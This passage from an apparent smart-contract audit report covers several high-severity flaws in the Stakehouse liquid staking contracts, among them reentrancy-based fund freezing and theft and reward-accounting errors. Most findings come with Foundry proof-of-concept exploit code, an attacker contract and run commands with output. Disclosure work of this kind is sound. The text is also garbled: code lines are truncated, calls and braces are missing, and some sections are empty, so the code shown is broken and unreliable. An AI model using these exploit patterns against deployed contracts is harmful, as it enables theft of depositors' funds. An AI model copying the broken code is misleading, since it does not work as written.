        bytes memory code = new bytes(1);
        code[0] = 0x00;
        vm.etch(address(0x123), code);
        stakingFundsVaults[0] = address(0x123);
        giantFeesAndMevPool.claimRewards(feesAndMevUserTwo, stakingFundsVaults, blsKeysForVaults);
        console.log("user one:", getBalance(feesAndMevUserOne));
        console.log("user two(attacker):", getBalance(feesAndMevUserTwo));
        console.log("giantFeesAndMevPool:", getBalance(address(giantFeesAndMevPool)));

    function getBalance(address addr) internal returns (uint){
        // giant LP : eth at ratio of 1:1
        return addr.balance + giantFeesAndMevPool.lpTokenETH().balanceOf(addr);


run test:

forge test --match-test testDWclaimRewards -vvv

test log:

  user one: 4000000000000000000
  user two(attacker): 6000000000000000000
  giantFeesAndMevPool: 6000000000000000000

The attacker stole 2 eth from the pool.

Tools Used



idleETH += _amounts[i];

before burnLPTokensForETH in the GiantMevAndFeesPool.bringUnusedETHBackIntoGiantPool function.

vince0656 (Stakehouse) confirmed

[H-11] Protocol insolvent - Permanent freeze of funds

Submitted by 0xdeadbeef0x, also found by joestakey

  • Permanent freeze of funds - users who deposited ETH for staking will not be able to receive their funds, rewards or rotate to another token. The protocol becomes insolvent, it cannot pay anything to the users.
  • Protocol’s LifecycleStatus state machine is broken

Other impacts:

  • Users deposit funds to an unstakable validator (node runner has already took out his funds)

Impact is also on the Giant Pools that give liquidity to the vaults.

A competitor or malicious actor can cause bad PR for the protocol by causing permanent freeze of user funds at LSD stakehouse.

Proof of Concept

There are two main bugs that cause the above impact:

  1. Reentrancy bug in withdrawETHForKnot function in LiquidStakingManager.sol
  2. Improper balance check in LiquidStakingManager.sol for deposited node runner funds.

For easier reading and understanding, please follow the below full attack flow diagram when reading through the explanation.

┌───────────┐               ┌───────────┐            ┌───────────┐              ┌───────────┐
│           │               │           │            │           │              │           │
│Node Runner│               │LSD Manager│            │   Vaults  │              │   Users   │
│           │               │           │            │           │              │           │
└─────┬─────┘               └─────┬─────┘            └─────┬─────┘              └─────┬─────┘
      │                           │                        │                          │
      │   Register BLS Key #1     │                        │                          │
      ├──────────────────────────►│                        │                          │
      │                           │                        │                          │
      │   Register BLS Key #1     │                        │                          │
      ├──────────────────────────►│                        │Deposit 24 ETH to savETH  │
      │                           │                        │◄─────────────────────────┤
      │                           │                        │                          │
      │                           │                        │Deposit 4 ETH to mevAndFees
      │                           │                        │◄─────────────────────────┐
      │WithdrawETHForKnot BLS #1  │                        │                          │
      ├──────────────────────────►│                        │                          │
      │       Send 4 ETH          │                        │                          │
      │◄──────────────────────────┤                        │                          │
      │ Reenter stake function    │                        │                          │
      ├──────────────────────────►│Get 28 ETH from vaults  │                          │
      │                           ├───────────────────────►│                          │
      │ ┌───────────────────────┐ │     Send 28 ETH        │                          │
      │ │ Stake complete.       │ │◄───────────────────────┤                          │
      │ │status=DEPOSIT_COMPLETE│ │                        │                          │
      │ └───────────────────────┘ │                        │                          │
      │Finished WithdrawETHForKnot│                        │                          │
      │◄──────────────────────────┤                        │Users cannot mint derivati│es
      │                           │                        │◄─────────────────────────┤
      │    ┌──────────────────┐   │                        │Users cannot burnLPTokens │
      │    │BLS Key #1 banned │   │                        │◄─────────────────────────┤
      │    └──────────────────┘   │                        │Users cannot rotateTokens │
      │                           │                        │◄─────────────────────────┤
      │                           │                        │                          │

Let’s assume the following starting point:

  1. Node runner registered and paid 4 ETH for BLS KEY #1
  2. Node runner registered and paid 4 ETH for BLS KEY #2
  3. savETH users collected 24 ETH ready for staking
  4. mevAndFess users collected 4 ETH ready for staking

Reentrancy in withdrawETHForKnot:

withdrawETHForKnot is a function used in LiquidStakingManager. It is used to refund a node runner if funds are not yet staked and BAN the BLS key.


    function withdrawETHForKnot(address _recipient, bytes calldata _blsPublicKeyOfKnot) external {
            4 ether
        bannedBLSPublicKeys[_blsPublicKeyOfKnot] = associatedSmartWallet;

The associatedSmartWallet will send the node runner 4 ETH (out of 8 currently in balance).

Please note:

  1. The Node Runner can reenter the LiquidStakingManager when receiving the 4 ETH
  2. bannedBLSPublicKeys[_blsPublicKeyOfKnot] = associatedSmartWallet; is only executed after the reentrancy

We can call any method we need with the following states:

  • BLS key is NOT banned
  • Status is IDataStructures.LifecycleStatus.INITIALS_REGISTERED

The node runner will call the stake function to stake the deposited funds from the vaults and change the status to IDataStructures.LifecycleStatus.DEPOSIT_COMPLETE


    function stake(
        bytes[] calldata _blsPublicKeyOfKnots,
        bytes[] calldata _ciphertexts,
        bytes[] calldata _aesEncryptorKeys,
        IDataStructures.EIP712Signature[] calldata _encryptionSignatures,
        bytes32[] calldata _dataRoots
    ) external {
            // check if BLS public key is registered with liquid staking derivative network and not banned
            require(isBLSPublicKeyBanned(blsPubKey) == false, "BLS public key is banned or not a part of LSD network");
                getAccountManager().blsPublicKeyToLifecycleStatus(blsPubKey) == IDataStructures.LifecycleStatus.INITIALS_REGISTERED,
                "Initials not registered"


The stake function checks

  1. That the BLS key is not banned. In our case its not yet banned, because the banning happens after the reentrancy
  2. IDataStructures.LifecycleStatus.INITIALS_REGISTERED is the current Lifecycle status. Which it is.
  3. There is enough balance in the vaults and node runners smart wallet in _assertEtherIsReadyForValidatorStaking

_assertEtherIsReadyForValidatorStaking checks that the node runners smart wallet has more than 4 ETH. Because our node runner has two BLS keys registered, there is an additional 4 ETH on BLS Key #2 and the conditions will pass.


    function _assertEtherIsReadyForValidatorStaking(bytes calldata blsPubKey) internal view {
        address associatedSmartWallet = smartWalletOfKnot[blsPubKey];
        require(associatedSmartWallet.balance >= 4 ether, "Smart wallet balance must be at least 4 ether");

        LPToken stakingFundsLP = stakingFundsVault.lpTokenForKnot(blsPubKey);
        require(address(stakingFundsLP) != address(0), "No funds staked in staking funds vault");
        require(stakingFundsLP.totalSupply() == 4 ether, "DAO staking funds vault balance must be at least 4 ether");

        LPToken savETHVaultLP = savETHVault.lpTokenForKnot(blsPubKey);
        require(address(savETHVaultLP) != address(0), "No funds staked in savETH vault");
        require(savETHVaultLP.totalSupply() == 24 ether, "KNOT must have 24 ETH in savETH vault");

Since we can pass all checks. _stake will be called which withdraws all needed funds from the vault and executes a call through the smart wallet to the TransactionRouter with 32 ETH needed for the stake. The TransactionRouter will process the funds and stake them. The LifecycleStatus will be updated to IDataStructures.LifecycleStatus.DEPOSIT_COMPLETE


    function _stake(
        bytes calldata _blsPublicKey,
        bytes calldata _cipherText,
        bytes calldata _aesEncryptorKey,
        IDataStructures.EIP712Signature calldata _encryptionSignature,
        bytes32 dataRoot
    ) internal {
        address smartWallet = smartWalletOfKnot[_blsPublicKey];

        // send 24 ether from savETH vault to smart wallet
        savETHVault.withdrawETHForStaking(smartWallet, 24 ether);

        // send 4 ether from DAO staking funds vault
        stakingFundsVault.withdrawETH(smartWallet, 4 ether);

        // interact with transaction router using smart wallet to deposit 32 ETH
            32 ether

After _stake and stake will finish executing we will finish the Cross-Function Reentrancy.

The protocol has entered the following state for the BLS key #1:

  1. BLS Key #1 is banned
  2. LifecycleStatus is IDataStructures.LifecycleStatus.DEPOSIT_COMPLETE

In such a state where the key is banned, no one can mint derivatives and therefor depositors cannot withdraw rewards/dETH:


    function mintDerivatives(
        bytes[] calldata _blsPublicKeyOfKnots,
        IDataStructures.ETH2DataReport[] calldata _beaconChainBalanceReports,
        IDataStructures.EIP712Signature[] calldata _reportSignatures
    ) external {
            // check if BLS public key is registered and not banned
            require(isBLSPublicKeyBanned(_blsPublicKeyOfKnots[i]) == false, "BLS public key is banned or not a part of LSD network");

Vault LP Tokens cannot be burned for withdraws because that is not supported in DEPOSIT_COMPLETE state:


    function burnLPToken(LPToken _lpToken, uint256 _amount) public nonReentrant returns (uint256) {
        bytes memory blsPublicKeyOfKnot = KnotAssociatedWithLPToken[_lpToken];
        IDataStructures.LifecycleStatus validatorStatus = getAccountManager().blsPublicKeyToLifecycleStatus(blsPublicKeyOfKnot);

            validatorStatus == IDataStructures.LifecycleStatus.INITIALS_REGISTERED ||
            validatorStatus == IDataStructures.LifecycleStatus.TOKENS_MINTED,
            "Cannot burn LP tokens"

Tokens cannot be rotated to other LP tokens because that is not supported in a DEPOSIT_COMPLETE state


    function rotateLPTokens(LPToken _oldLPToken, LPToken _newLPToken, uint256 _amount) public {
        bytes memory blsPublicKeyOfPreviousKnot = KnotAssociatedWithLPToken[_oldLPToken];
            getAccountManager().blsPublicKeyToLifecycleStatus(blsPublicKeyOfPreviousKnot) == IDataStructures.LifecycleStatus.INITIALS_REGISTERED,
            "Lifecycle status must be one"

Funds are stuck, they cannot be taken or used.
The LifecycleStatus is also stuck, tokens cannot be minted.

Foundry POC

The POC will showcase the scenario in the diagram.

Add the following contracts to liquid-staking folder:

// SPDX-License-Identifier: MIT

pragma solidity 0.8.13;

import { LiquidStakingManager } from "../../liquid-staking/LiquidStakingManager.sol";
import { TestUtils } from "../../../test/utils/TestUtils.sol";

contract NodeRunner {
    bytes blsPublicKey1;
    LiquidStakingManager manager;
    TestUtils testUtils;

    constructor(LiquidStakingManager _manager, bytes memory _blsPublicKey1, bytes memory _blsPublicKey2, address _testUtils) payable public {
        manager = _manager;
        blsPublicKey1 = _blsPublicKey1;
        testUtils = TestUtils(_testUtils);
        //register BLS Key #1
        manager.registerBLSPublicKeys{ value: 4 ether }(
        // Register BLS Key #2
        manager.registerBLSPublicKeys{ value: 4 ether }(
    receive() external payable {

Add the following imports to LiquidStakingManager.t.sol

import { NodeRunner } from "../../contracts/testing/liquid-staking/NodeRunner.sol";
import { IDataStructures } from "@blockswaplab/stakehouse-contract-interfaces/contracts/interfaces/IDataStructures.sol";

Add the following test to LiquidStakingManager.t.sol

    function testLockStakersFunds() public {
        uint256 startAmount = 8 ether;
        // Create NodeRunner. Constructor registers two BLS Keys
        address nodeRunner = address(new NodeRunner{value: startAmount}(manager, blsPubKeyOne, blsPubKeyTwo, address(this)));
        // Simulate state transitions in lifecycle status to initials registered (value of 1)
        MockAccountManager(factory.accountMan()).setLifecycleStatus(blsPubKeyOne, 1);

        // savETHUser, feesAndMevUser funds used to deposit into validator BLS key #1
        address feesAndMevUser = accountTwo;, 4 ether);
        address savETHUser = accountThree;, 24 ether);
        // deposit savETHUser, feesAndMevUser funds for validator #1
        depositIntoDefaultSavETHVault(savETHUser, blsPubKeyOne, 24 ether);
        depositIntoDefaultStakingFundsVault(feesAndMevUser, blsPubKeyOne, 4 ether);

        // withdraw ETH for first BLS key and reenter
        // This will perform a cross-function reentracy to call stake
        manager.withdrawETHForKnot(nodeRunner, blsPubKeyOne);
        // Simulate state transitions in lifecycle status to ETH deposited (value of 2)
        // In real deployment, when stake is called TransactionRouter.registerValidator is called to change the state to DEPOSIT_COMPLETE 
        MockAccountManager(factory.accountMan()).setLifecycleStatus(blsPubKeyOne, 2);
        // Validate mintDerivatives reverts because of banned public key 
        (,IDataStructures.ETH2DataReport[] memory reports) = getFakeBalanceReport();
        (,IDataStructures.EIP712Signature[] memory sigs) = getFakeEIP712Signature();
        vm.expectRevert("BLS public key is banned or not a part of LSD network");

        // Validate depositor cannot burn LP tokens
        vm.expectRevert("Cannot burn LP tokens");
        savETHVault.burnLPTokensByBLS(getBytesArrayFromBytes(blsPubKeyOne), getUint256ArrayFromValues(24 ether));

To run the POC execute: yarn test -m testLockStakersFunds -v

Expected output:

Running 1 test for test/foundry/LiquidStakingManager.t.sol:LiquidStakingManagerTests
[PASS] testLockStakersFunds() (gas: 1731537)
Test result: ok. 1 passed; 0 failed; finished in 8.21ms

To see the full trace, execute: yarn test -m testLockStakersFunds -vvvv

Tools Used

VS Code, Foundry

  1. Add a reentrancy guard to withdrawETHForKnot and stake
  2. Keep proper accounting for ETH deposited by node runner for each BLS key

vince0656 (Stakehouse) confirmed

[H-12] Sender transferring GiantMevAndFeesPool tokens can afterward experience pool DOS and orphaning of future rewards

Submitted by 9svR6w, also found by JTJabba, unforgiven, and aphak5010

When a user transfers away GiantMevAndFeesPool tokens, the pool’s claimed[] computed is left unchanged and still corresponds to what they had claimed with their old (higher) number of tokens. (See GiantMevAndFeesPool afterTokenTransfer() - no adjustment is made to claimed[] on the from side.) As a result, their claimed[] may be higher than the max amount they could possibly have claimed for their new (smaller) number of tokens. The erroneous claimed value can cause an integer overflow when the claimed[] value is subtracted, leading to inability for this user to access some functions of the GiantMevAndFeesPool - including such things as being able to transfer their tokens (overflow is triggered in a callback attempting to pay out their rewards). These overflows will occur in SyndicateRewardsProcessor’s _previewAccumulatedETH() and _distributeETHRewardsToUserForToken(), the latter of which is called in a number of places. When rewards are later accumulated in the pool, the user will not be able to claim certain rewards owed to them because of the incorrect (high) claimed[] value. The excess rewards will be orphaned in the pool.

Proof of Concept

This patch demonstrates both DOS and orphaned rewards due to the claimed[] error described above. Note that the patch includes a temp fix for the separate issue calculating claimed[] in _distributeETHRewardsToUserForToken() in order to demonstrate this is a separate issue.

Run test

forge test -m testTransferDOSUserOrphansFutureRewards


diff --git a/contracts/liquid-staking/SyndicateRewardsProcessor.sol b/contracts/liquid-staking/SyndicateRewardsProcessor.sol
index 81be706..ca44ae6 100644
--- a/contracts/liquid-staking/SyndicateRewardsProcessor.sol
+++ b/contracts/liquid-staking/SyndicateRewardsProcessor.sol
@@ -60,7 +60,7 @@ abstract contract SyndicateRewardsProcessor {
             // Calculate how much ETH rewards the address is owed / due 
             uint256 due = ((accumulatedETHPerLPShare * balance) / PRECISION) - claimed[_user][_token];
             if (due > 0) {
-                claimed[_user][_token] = due;
+                claimed[_user][_token] += due; // temp fix claimed calculation
                 totalClaimed += due;
diff --git a/test/foundry/GiantPools.t.sol b/test/foundry/GiantPools.t.sol
index 7e8bfdb..6468373 100644
--- a/test/foundry/GiantPools.t.sol
+++ b/test/foundry/GiantPools.t.sol
@@ -5,14 +5,18 @@ pragma solidity ^0.8.13;
 import "forge-std/console.sol";
 import { TestUtils } from "../utils/TestUtils.sol";
+import { MockLiquidStakingManager } from "../../contracts/testing/liquid-staking/MockLiquidStakingManager.sol";
 import { GiantSavETHVaultPool } from "../../contracts/liquid-staking/GiantSavETHVaultPool.sol";
 import { GiantMevAndFeesPool } from "../../contracts/liquid-staking/GiantMevAndFeesPool.sol";
 import { LPToken } from "../../contracts/liquid-staking/LPToken.sol";
+import { GiantLP } from "../../contracts/liquid-staking/GiantLP.sol";
 import { MockSlotRegistry } from "../../contracts/testing/stakehouse/MockSlotRegistry.sol";
 import { MockSavETHVault } from "../../contracts/testing/liquid-staking/MockSavETHVault.sol";
 import { MockGiantSavETHVaultPool } from "../../contracts/testing/liquid-staking/MockGiantSavETHVaultPool.sol";
 import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+import "forge-std/console.sol";
 contract GiantPoolTests is TestUtils {
     MockGiantSavETHVaultPool public giantSavETHPool;
@@ -116,4 +120,171 @@ contract GiantPoolTests is TestUtils {
         assertEq(dETHToken.balanceOf(savETHUser), 24 ether);
+    function addNewLSM(address payable giantFeesAndMevPool, bytes memory blsPubKey) public returns (address payable) {
+        manager = deployNewLiquidStakingNetwork(
+            factory,
+            admin,
+            true,
+            "LSDN"
+        );
+        savETHVault = MockSavETHVault(address(manager.savETHVault()));
+        giantSavETHPool = new MockGiantSavETHVaultPool(factory, savETHVault.dETHToken());
+        // Set up users and ETH
+        address nodeRunner = accountOne;, 12 ether);
+        address savETHUser = accountThree;, 24 ether);
+        // Register BLS key
+        registerSingleBLSPubKey(nodeRunner, blsPubKey, accountFour);
+        // Deposit ETH into giant savETH
+        vm.prank(savETHUser);
+        giantSavETHPool.depositETH{value: 24 ether}(24 ether);
+        assertEq(giantSavETHPool.lpTokenETH().balanceOf(savETHUser), 24 ether);
+        assertEq(address(giantSavETHPool).balance, 24 ether);
+        // Deploy ETH from giant LP into savETH pool of LSDN instance
+        bytes[][] memory blsKeysForVaults = new bytes[][](1);
+        blsKeysForVaults[0] = getBytesArrayFromBytes(blsPubKey);
+        uint256[][] memory stakeAmountsForVaults = new uint256[][](1);
+        stakeAmountsForVaults[0] = getUint256ArrayFromValues(24 ether);
+        giantSavETHPool.batchDepositETHForStaking(
+            getAddressArrayFromValues(address(manager.savETHVault())),
+            getUint256ArrayFromValues(24 ether),
+            blsKeysForVaults,
+            stakeAmountsForVaults
+        );
+        assertEq(address(manager.savETHVault()).balance, 24 ether);
+        assert(giantFeesAndMevPool.balance >= 4 ether);
+        stakeAmountsForVaults[0] = getUint256ArrayFromValues(4 ether);
+        GiantMevAndFeesPool(giantFeesAndMevPool).batchDepositETHForStaking(
+            getAddressArrayFromValues(address(manager.stakingFundsVault())),
+            getUint256ArrayFromValues(4 ether),
+            blsKeysForVaults,
+            stakeAmountsForVaults
+        );
+        // Ensure we can stake and mint derivatives
+        stakeAndMintDerivativesSingleKey(blsPubKey);
+        return payable(manager);
+    }
+    function testTransferDOSUserOrphansFutureRewards() public {
+        address feesAndMevUserOne = accountTwo;, 8 ether);
+        address feesAndMevUserTwo = accountFour;
+       // Deposit ETH into giant fees and mev
+        vm.startPrank(feesAndMevUserOne);
+        giantFeesAndMevPool.depositETH{value: 8 ether}(8 ether);
+        vm.stopPrank();
+        MockLiquidStakingManager manager1 = MockLiquidStakingManager(addNewLSM(payable(giantFeesAndMevPool), blsPubKeyOne));
+        MockLiquidStakingManager manager2 = MockLiquidStakingManager(addNewLSM(payable(giantFeesAndMevPool), blsPubKeyTwo));
+        bytes[][] memory blsPubKeyOneInput = new bytes[][](1);
+        blsPubKeyOneInput[0] = getBytesArrayFromBytes(blsPubKeyOne);
+        bytes[][] memory blsPubKeyTwoInput = new bytes[][](1);
+        blsPubKeyTwoInput[0] = getBytesArrayFromBytes(blsPubKeyTwo);
+        vm.warp(block.timestamp + 3 hours);
+        // Add 2 eth rewards to manager1's staking funds vault.
+, 2 ether);
+        // Claim rewards into the giant pool and distribute them to user one.
+        vm.startPrank(feesAndMevUserOne);
+        giantFeesAndMevPool.claimRewards(
+            feesAndMevUserOne,
+            getAddressArrayFromValues(address(manager1.stakingFundsVault())),
+            blsPubKeyOneInput);
+        vm.stopPrank();
+        // User one has received all the rewards and has no more previewed rewards.
+        assertEq(feesAndMevUserOne.balance, 2 ether);
+        assertEq(giantFeesAndMevPool.totalRewardsReceived(), 2 ether);
+        assertEq(
+            giantFeesAndMevPool.previewAccumulatedETH(
+                feesAndMevUserOne,
+                new address[](0),
+                new LPToken[][](0)),
+                0);
+        // Check the claimed[] value for user 1. It is correct.
+        assertEq(
+            giantFeesAndMevPool.claimed(feesAndMevUserOne, address(giantFeesAndMevPool.lpTokenETH())),
+            2 ether);
+        // User one transfers half their giant tokens to user 2.
+        vm.startPrank(feesAndMevUserOne);
+        giantFeesAndMevPool.lpTokenETH().transfer(feesAndMevUserTwo, 4 ether);
+        vm.stopPrank();
+        // After the tokens have been transferred to user 2, user 1's claimed[] remains
+        // unchanged - and is higher than the accumulated payout per share for user 1's
+        // current number of shares.
+        assertEq(
+            giantFeesAndMevPool.claimed(feesAndMevUserOne, address(giantFeesAndMevPool.lpTokenETH())),
+            2 ether);
+        // With this incorrect value of claimed[] causing a subtraction underflow, user one
+        // cannot preview accumulated eth or perform any action that attempts to claim their
+        // rewards such as transferring their tokens.
+        vm.startPrank(feesAndMevUserOne);
+        vm.expectRevert();
+        giantFeesAndMevPool.previewAccumulatedETH(
+            feesAndMevUserOne,
+            new address[](0),
+            new LPToken[][](0));
+        console.log("the revert expected now");
+        GiantLP token = giantFeesAndMevPool.lpTokenETH();
+        vm.expectRevert();
+        token.transfer(feesAndMevUserTwo, 1 ether);
+        vm.stopPrank();
+        // Add 1 eth rewards to manager2's staking funds vault.
+, 2 ether);
+        // User 2 claims rewards into the giant pool and obtains its 1/2 share.
+        vm.startPrank(feesAndMevUserTwo);
+        giantFeesAndMevPool.claimRewards(
+            feesAndMevUserTwo,
+            getAddressArrayFromValues(address(manager2.stakingFundsVault())),
+            blsPubKeyTwoInput);
+        vm.stopPrank();
+        assertEq(feesAndMevUserTwo.balance, 1 ether);
+        // At this point, user 1 ought to have accumulated 1 ether from the rewards,
+        // however accumulated eth is listed as 0.
+        // The reason is that when the giant pool tokens were transferred to
+        // user two, the claimed[] value for user one was left unchanged.
+        assertEq(
+            giantFeesAndMevPool.previewAccumulatedETH(
+                feesAndMevUserOne,
+                new address[](0),
+                new LPToken[][](0)),
+                0);
+        // The pool has received 4 eth rewards and paid out 3, but no users
+        // are listed as having accumulated the eth. It is orphaned.
+        assertEq(giantFeesAndMevPool.totalRewardsReceived(), 4 ether);
+        assertEq(giantFeesAndMevPool.totalClaimed(), 3 ether);
+        assertEq(
+            giantFeesAndMevPool.previewAccumulatedETH(
+                feesAndMevUserTwo,
+                new address[](0),
+                new LPToken[][](0)),
+                0);
+    }
\ No newline at end of file

Reduce claimed[] when necessary on the from side when GiantMevAndFeesPool tokens are transferred. Alternatively, claimed[] could be calculated on a per share basis rather than a total basis in order to simplify some of the adjustments that must be made in the code for claimed[].

vince0656 (Stakehouse) confirmed

[H-13] Possible reentrancy and fund theft in withdrawDETH() of GiantSavETHVaultPool because there is no whitelist check for user provided Vaults and there is no reentrancy defense

Submitted by unforgiven

Function withdrawDETH() in GiantSavETHVaultPool allows a user to burn their giant LP in exchange for dETH that is ready to withdraw from a set of savETH vaults. This function make external calls to user provided addresses without checking those addresses and send increased dETH balance of contract during the call to user. User can provide malicious addresses to contract and then took the execution flow during the transaction and increase dETH balance of contract by other calls and make contract to transfer them to him.

Proof of Concept

This is withdrawDETH() in GiantSavETHVaultPool code:

    /// @notice Allow a user to burn their giant LP in exchange for dETH that is ready to withdraw from a set of savETH vaults
    /// @param _savETHVaults List of savETH vaults being interacted with
    /// @param _lpTokens List of savETH vault LP being burnt from the giant pool in exchange for dETH
    /// @param _amounts Amounts of giant LP the user owns which is burnt 1:1 with savETH vault LP and in turn that will give a share of dETH
    function withdrawDETH(
        address[] calldata _savETHVaults,
        LPToken[][] calldata _lpTokens,
        uint256[][] calldata _amounts
    ) external {
        uint256 numOfVaults = _savETHVaults.length;
        require(numOfVaults > 0, "Empty arrays");
        require(numOfVaults == _lpTokens.length, "Inconsistent arrays");
        require(numOfVaults == _amounts.length, "Inconsistent arrays");

        // Firstly capture current dETH balance and see how much has been deposited after the loop
        uint256 dETHReceivedFromAllSavETHVaults = getDETH().balanceOf(address(this));
        for (uint256 i; i < numOfVaults; ++i) {
            SavETHVault vault = SavETHVault(_savETHVaults[i]);

            // Simultaneously check the status of LP tokens held by the vault and the giant LP balance of the user
            for (uint256 j; j < _lpTokens[i].length; ++j) {
                LPToken token = _lpTokens[i][j];
                uint256 amount = _amounts[i][j];

                // Check the user has enough giant LP to burn and that the pool has enough savETH vault LP
                _assertUserHasEnoughGiantLPToClaimVaultLP(token, amount);

                require(vault.isDETHReadyForWithdrawal(address(token)), "dETH is not ready for withdrawal");

                // Giant LP is burned 1:1 with LPs from sub-networks
                require(lpTokenETH.balanceOf(msg.sender) >= amount, "User does not own enough LP");

                // Burn giant LP from user before sending them dETH
                lpTokenETH.burn(msg.sender, amount);

                emit LPBurnedForDETH(address(token), msg.sender, amount);

            // Ask
            vault.burnLPTokens(_lpTokens[i], _amounts[i]);

        // Calculate how much dETH has been received from burning
        dETHReceivedFromAllSavETHVaults = getDETH().balanceOf(address(this)) - dETHReceivedFromAllSavETHVaults;

        // Send giant LP holder dETH owed
        getDETH().transfer(msg.sender, dETHReceivedFromAllSavETHVaults);

As you can see first contract save the dETH balance of contract by this line: uint256 dETHReceivedFromAllSavETHVaults = getDETH().balanceOf(address(this)); and then it loops through user provided vaults addresses and call those vaults to withdraw dETH and in the end it calculates dETHReceivedFromAllSavETHVaults and transfer those dETH to user: getDETH().transfer(msg.sender, dETHReceivedFromAllSavETHVaults);. attacker can perform these steps:

  1. create a malicious contract AttackerVault which is copy of SavETHVault with modifiction.
  2. call withdrawDETH() with Vault list [ValidVault1, ValidVault2, AttackerVault, ValidVaul3].
  3. contract would save the dETH balance of itself and then loops through Vaults to validate and burn LPTokens.
  4. contract would reach Vault AttackerVault and call attacker controlled address.
  5. attacker contract call other functions to increase dETH balance of contract (if it’s not possible to increase dETH balance of contract by other way so there is no need to save contract initial balance of dETH before the loop and dETH balance of contract would be zero always)
  6. withdrawDETH() would finish the loop and transfer all the increase dETH balance to attacker which includes extra amounts.

Because contract don’t check the provided addresses and calls them and there is no reentrancy defense mechanism there is possibility of reentrancy attack which can cause fund lose.

Tools Used


Check the provided addresses and also have some reentrancy defense mechanisim.

vince0656 (Stakehouse) confirmed

[H-14] Fund lose in function bringUnusedETHBackIntoGiantPool() of GiantSavETHVaultPool ETH gets back to giant pool but the value of idleETH don’t increase

Submitted by unforgiven

Variable idleETH in giant pools is storing total amount of ETH sat idle ready for either withdrawal or depositing into a liquid staking network and whenever a deposit or withdraw happens contract adjust the value of idleETH of contract, but in function bringUnusedETHBackIntoGiantPool() which brings unused ETH from savETH vault to giant pool the value of idleETH don’t get increased which would cause those ETH balance to not be accessible for future staking or withdrawing.

Proof of Concept

This is bringUnusedETHBackIntoGiantPool() code in GiantSavETHVaultPool():

    /// @notice Any ETH that has not been utilized by a savETH vault can be brought back into the giant pool
    /// @param _savETHVaults List of savETH vaults where ETH is staked
    /// @param _lpTokens List of LP tokens that the giant pool holds which represents ETH in a savETH vault
    /// @param _amounts Amounts of LP within the giant pool being burnt
    function bringUnusedETHBackIntoGiantPool(
        address[] calldata _savETHVaults,
        LPToken[][] calldata _lpTokens,
        uint256[][] calldata _amounts
    ) external {
        uint256 numOfVaults = _savETHVaults.length;
        require(numOfVaults > 0, "Empty arrays");
        require(numOfVaults == _lpTokens.length, "Inconsistent arrays");
        require(numOfVaults == _amounts.length, "Inconsistent arrays");
        for (uint256 i; i < numOfVaults; ++i) {
            SavETHVault vault = SavETHVault(_savETHVaults[i]);
            for (uint256 j; j < _lpTokens[i].length; ++j) {
                    vault.isDETHReadyForWithdrawal(address(_lpTokens[i][j])) == false,
                    "ETH is either staked or derivatives minted"

            vault.burnLPTokens(_lpTokens[i], _amounts[i]);

As you can see it checks that ETH is available in savETH vault and then calls to burnLPTokens() to burn savETH LP tokens and bring unused ETH to giant pool address, this would increase giant pool ETH balance but code don’t increase the idleETH value so contract would lose tracking of real idle ETH balance of contract. because the vaule of idleETH is used when withdrawing or depositing into savETH vaults so the contract can’t reuse the returned ETH. these are the steps that cause this bug to happen:

  1. giant pool has 100 idleETH.
  2. with function batchDepositETHForStaking() users stake 80 ETH and the new value of idleETH would be 20 and contract LP Token balance increase by 80.
  3. the 80 newly staked ETH is not yet staked in stakehouse.
  4. with function bringUnusedETHBackIntoGiantPool() users bring back those 80 ETH from Vaults to giant pool and burn giant pool LP tokens and then giant pool have 100 idle ETH but because idleETH value don’t get increase it still would show 20.
  5. the extra 80 ETH would returned to giant pool wouldn’t be accessible for withdrawing to users or depositing into Vaults because in withdrawing or depositing into Vaults the value of idleETH has been used to know the amount of idle ETH in giant pool and because the value doesn’t show the correct amount so the extra amount of ETH wouldn’t be lost.

Tools Used


Contract should correctly update value of idleETH in different actions because withdraw and deposit logics depend on it.

vince0656 (Stakehouse) confirmed

[H-15] User loses remaining rewards in GiantMevAndFeesPool when new deposits happen because _onDepositETH() set claimed[][] to max without transferring user remaining rewards

Submitted by unforgiven

When depositETH() is called in giant pool it calls _onDepositETH() which calls _setClaimedToMax() to make sure new ETH stakers are not entitled to ETH earned by but this can cause users to lose their remaining rewards when they deposits. code should first transfer user remaining rewards when deposit happens.

Proof of Concept

This is depositETH() code in GiantPoolBase:

    /// @notice Add ETH to the ETH LP pool at a rate of 1:1. LPs can always pull out at same rate.
    function depositETH(uint256 _amount) public payable {
        require(msg.value >= MIN_STAKING_AMOUNT, "Minimum not supplied");
        require(msg.value == _amount, "Value equal to amount");

        // The ETH capital has not yet been deployed to a liquid staking network
        idleETH += msg.value;

        // Mint giant LP at ratio of 1:1, msg.value);

        // If anything extra needs to be done

        emit ETHDeposited(msg.sender, msg.value);

As you can see it increase user lpTokenETH balance and then calls _onDepositETH(). This is _onDepositETH() and _setClaimedToMax() code in GiantMevAndFeesPool contract:

    /// @dev On depositing on ETH set claimed to max claim so the new depositor cannot claim ETH that they have not accrued
    function _onDepositETH() internal override {

    /// @dev Internal re-usable method for setting claimed to max for msg.sender
    function _setClaimedToMax(address _user) internal {
        // New ETH stakers are not entitled to ETH earned by
        claimed[_user][address(lpTokenETH)] = (accumulatedETHPerLPShare * lpTokenETH.balanceOf(_user)) / PRECISION;

As you can see the code set claimed[msg.sender][address(lpTokenETH] to maximum value so the user wouldn’t be entitled to previous rewards but if user had some remaining rewards in contract he would lose those rewards can’t withdraw them. these are the steps:

  1. user1 deposit 10 ETH to giant pool and accumulatedETHPerLPShare value is 2 and claimed[user1][lpTokenETH] would be 10 * 2 = 20.
  2. some time passes and accumulatedETHPerLPShare set to 4 and user1 has 10 * 4 - 20 = 20 unclaimed ETH rewards (the formula in the code: balance * rewardPerShare - claimed).
  3. user deposit 5 ETH to giant pool and accumulatedETHPerLPShare is 4 so the code would call _onDepositETH() which calls _setClaimedToMax which sets claimed[user1][lpTokenETH] to 15 * 4 = 60.
  4. user1 new remaining ETH reward would be 15 * 4 - 60 = 0. and user1 won’t receive his rewards because when he deposits contract don’t transfer remaining rewards and set claim to max so user loses his funds.

Tools Used


When deposit happens, contract should first send remaining rewards, then increase the user’s balance and then set the user claim to max.

vince0656 (Stakehouse) confirmed

[H-16] Reentrancy vulnerability in GiantMevAndFeesPool.withdrawETH

Submitted by cccz

GiantMevAndFeesPool.withdrawETH calls lpTokenETH.burn, then GiantMevAndFeesPool.beforeTokenTransfer, followed by a call to _distributeETHRewardsToUserForToken sends ETH to the user, which allows the user to call any function in the fallback. While GiantMevAndFeesPool.withdrawETH has the nonReentrant modifier, GiantMevAndFeesPool.claimRewards does not have the nonReentrant modifier.
